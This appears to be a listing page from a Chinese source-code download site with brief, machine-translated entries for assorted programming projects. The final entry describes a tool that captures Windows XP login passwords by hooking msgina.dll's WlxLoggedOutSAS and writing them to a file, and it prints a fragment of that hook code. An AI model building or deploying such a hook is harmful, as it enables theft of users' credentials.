-
ATL
基于ATL的ActiveX入门举例-ATL-based portal for the ActiveX
- 2023-03-25 06:55:03下载
- 积分:1
-
用UML 制做的银行存款系统
用UML 制做的银行存款系统-活动图.用于分析各活动状态的变化.-UML produced deposits in the bank system-activity diagram. For analysis of the state of activity changes.
- 2023-06-23 11:25:02下载
- 积分:1
-
use vb6.0 mo development of the geographic information system, more suitable for...
这是一个利用vb6.0+mo开发的地理信息系统,比较适合初学者看并使用。-use vb6.0 mo development of the geographic information system, more suitable for beginners to see and use.
- 2023-08-07 13:00:03下载
- 积分:1
-
Multi
遗传算法中多点交叉算法来优化最小值函数所对应的解--编码过程-Multi-point genetic algorithm to optimize the cross-algorithm corresponding to the minimum function of the solution- the process of encoding
- 2022-01-26 00:40:34下载
- 积分:1
-
big码转GB码源码,即汉字繁简转换
big码转GB码源码,即汉字繁简转换...
big码转GB码源码,即汉字繁简转换
big码转GB码源码,即汉字繁简转换-big switch codes GB source code, that is big Chinese character conversion code to source code GB, Chinese character conversion
- 2022-03-14 19:55:04下载
- 积分:1
-
风格化,基于VC++的opengl图形代码
风格化,基于VC++的opengl图形代码-Style, and based on VC++ The opengl graphics code
- 2023-04-21 22:00:03下载
- 积分:1
-
这次是PB的
这次是PB的-this PB.
- 2023-09-06 16:10:03下载
- 积分:1
-
A Multiplayer DirectDraw Game using Winsock With librarys I made for each.zip
A Multiplayer DirectDraw Game using Winsock With librarys I made for each.zip
- 2022-03-31 11:29:10下载
- 积分:1
-
noise estimation
图像去噪算法通常需要根据噪声水平调整参数。我们提出了一个快速和快速的r
- 2023-07-31 17:35:02下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1